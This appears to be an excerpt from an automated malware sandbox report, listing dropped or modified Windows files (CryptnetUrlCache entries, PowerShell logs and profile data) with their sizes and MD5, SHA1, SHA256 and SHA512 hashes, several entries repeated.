SHA1ee90433b4579a5e67273c0b0be168d0ea0e0b9e9
SHA2560910eb02fcd7ee5b30d0c82d45705baf7785a3915c8ef7469ee727eacb53948e
SHA512179c30136d942260812efbc57d5577196819434f78cb2c1f04b526788f2707e3529eba949984777f81a857371f8499ac3cbc40918e24db8e0151ca20111e213a
-
Filesize
6.8MB
MD59c260f02466af673138ccb06e0158a79
SHA1edb03d2ba61518454a696959c93fc459bafbab38
SHA256304dea5bce7bf7fadb7cc65e97fddfe0a4efb6fe27dd80b2b6775326cbf0fe3c
SHA512a1579a5b0f51a8daa523aec90eff3e5c23ca55131b74d652618bccb864ef0d1ac620fe0f8dbc468770d8a164b16fbfc519d5a6a022656f019a47645b5650af17
-
Filesize
6.8MB
MD59c260f02466af673138ccb06e0158a79
SHA1edb03d2ba61518454a696959c93fc459bafbab38
SHA256304dea5bce7bf7fadb7cc65e97fddfe0a4efb6fe27dd80b2b6775326cbf0fe3c
SHA512a1579a5b0f51a8daa523aec90eff3e5c23ca55131b74d652618bccb864ef0d1ac620fe0f8dbc468770d8a164b16fbfc519d5a6a022656f019a47645b5650af17
-
Filesize
6.8MB
MD59c260f02466af673138ccb06e0158a79
SHA1edb03d2ba61518454a696959c93fc459bafbab38
SHA256304dea5bce7bf7fadb7cc65e97fddfe0a4efb6fe27dd80b2b6775326cbf0fe3c
SHA512a1579a5b0f51a8daa523aec90eff3e5c23ca55131b74d652618bccb864ef0d1ac620fe0f8dbc468770d8a164b16fbfc519d5a6a022656f019a47645b5650af17
-
Filesize
6.8MB
MD59c260f02466af673138ccb06e0158a79
SHA1edb03d2ba61518454a696959c93fc459bafbab38
SHA256304dea5bce7bf7fadb7cc65e97fddfe0a4efb6fe27dd80b2b6775326cbf0fe3c
SHA512a1579a5b0f51a8daa523aec90eff3e5c23ca55131b74d652618bccb864ef0d1ac620fe0f8dbc468770d8a164b16fbfc519d5a6a022656f019a47645b5650af17
-
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
Filesize717B
MD5ec8ff3b1ded0246437b1472c69dd1811
SHA1d813e874c2524e3a7da6c466c67854ad16800326
SHA256e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab
SHA512e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552
-
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\48F3BB146086CEF37D471FBE460215C9
Filesize503B
MD5621508f17d93fd294e34c57dfa64738d
SHA162461f51e5b931c49821642bce03bdcff0a03293
SHA2566f69f363bd19069bcad746e7ae100f3efd32e71a91a876d1962e194e07719664
SHA512640c241218f4fb8012c14e29d33473b93ac4382eba3e87d3795a15ba5a4467e8d3e403bc61842434d01115fa5ba237b2282990150993067239a93e7f9b84b970
-
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize192B
MD5c3c73bf2219e9fef5e596cb73fe35056
SHA17c29a893dca610da9b2728a7674a09f12490a973
SHA25608bab4df32a9dcf2fe84c54e6faf776eac5e190b4c9287a788af5ba0a8cdb9f0
SHA5120d697af3547955be2d130f9829e3be1c6a8cec5092d7145c550ed2728e7169e02c1a6048ea94804ca2775989ba22d23c0389e757367b278007a7de1558c75d2a
-
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\48F3BB146086CEF37D471FBE460215C9
Filesize560B
MD59858bd5f7c45af8cc1d0291e359bd6bc
SHA1cf4bba1f481207e501888fcd1fb9372ecabe7973
SHA256ba35759f2c6b7bd3dea9db9f5fed2921fa68e5fca228b0452f478b80ab8a83f9
SHA512f2e8f196e763abad079885a68acc97dd251d689b94dbd8c07e8b32174d27c47e38df72bd8c3e0fb63ebcfb8d2d4452b3514b89d55dfee5feeb130eaa95f98105
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5d2599a484f9247a0bec0a58acfba3a27
SHA1e46ea346878129af25f4081857b878bd58a8e475
SHA2565c3901d344b531f2ca6b63e970b5ed33aa5645d615a710f57dc3fe00d4d29b98
SHA5124772141ebcabe293c7f6f9a7f861df289948a0532265522c1f23a1bfeeeb7e569e557829321dc0771238154f507713645d82cc9919fe56ab13c8b463e95f4629
-
Filesize
6.2MB
MD579c334ffda2ea8a633a7261c23d5b0d1
SHA11a034c55ee56cf1def308077354686333c9c8094
SHA256fd7dbd3d96ef470cdc0de56004b39e34bf3159e7bcd777a6d437345d142e27f5
SHA51272307c88233f6752c6ceb3ed1b5631f61a999af3646cb56ecf917d2d0e7625af3a12b07655be792214307c72fc9ba950a2c690ed7354b822a19cefcd4a25560a
-
Filesize
6.2MB
MD579c334ffda2ea8a633a7261c23d5b0d1
SHA11a034c55ee56cf1def308077354686333c9c8094
SHA256fd7dbd3d96ef470cdc0de56004b39e34bf3159e7bcd777a6d437345d142e27f5
SHA51272307c88233f6752c6ceb3ed1b5631f61a999af3646cb56ecf917d2d0e7625af3a12b07655be792214307c72fc9ba950a2c690ed7354b822a19cefcd4a25560a
-
Filesize
6.8MB
MD59c260f02466af673138ccb06e0158a79
SHA1edb03d2ba61518454a696959c93fc459bafbab38
SHA256304dea5bce7bf7fadb7cc65e97fddfe0a4efb6fe27dd80b2b6775326cbf0fe3c
SHA512a1579a5b0f51a8daa523aec90eff3e5c23ca55131b74d652618bccb864ef0d1ac620fe0f8dbc468770d8a164b16fbfc519d5a6a022656f019a47645b5650af17
-
Filesize
6.8MB
MD59c260f02466af673138ccb06e0158a79
SHA1edb03d2ba61518454a696959c93fc459bafbab38
SHA256304dea5bce7bf7fadb7cc65e97fddfe0a4efb6fe27dd80b2b6775326cbf0fe3c
SHA512a1579a5b0f51a8daa523aec90eff3e5c23ca55131b74d652618bccb864ef0d1ac620fe0f8dbc468770d8a164b16fbfc519d5a6a022656f019a47645b5650af17
-
Filesize
5KB
MD5d3a51df1d0047a0f060dcd722c05246e
SHA1fd6a19bc6e324dc7059bd28dcb7912dae9cbc977
SHA256d5f36070b46d951d1afe7f06016b8386b73dc4c236a6870418ca7a047076e4df
SHA512dc93abcb7f7ceab0b628e8078e112c14c551e814b182a36c0a2fb5fd0eb9000fc2183ff6f7be2ff9ab404f15d150521b1dcb5531564a2927a76caf69052ba274
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732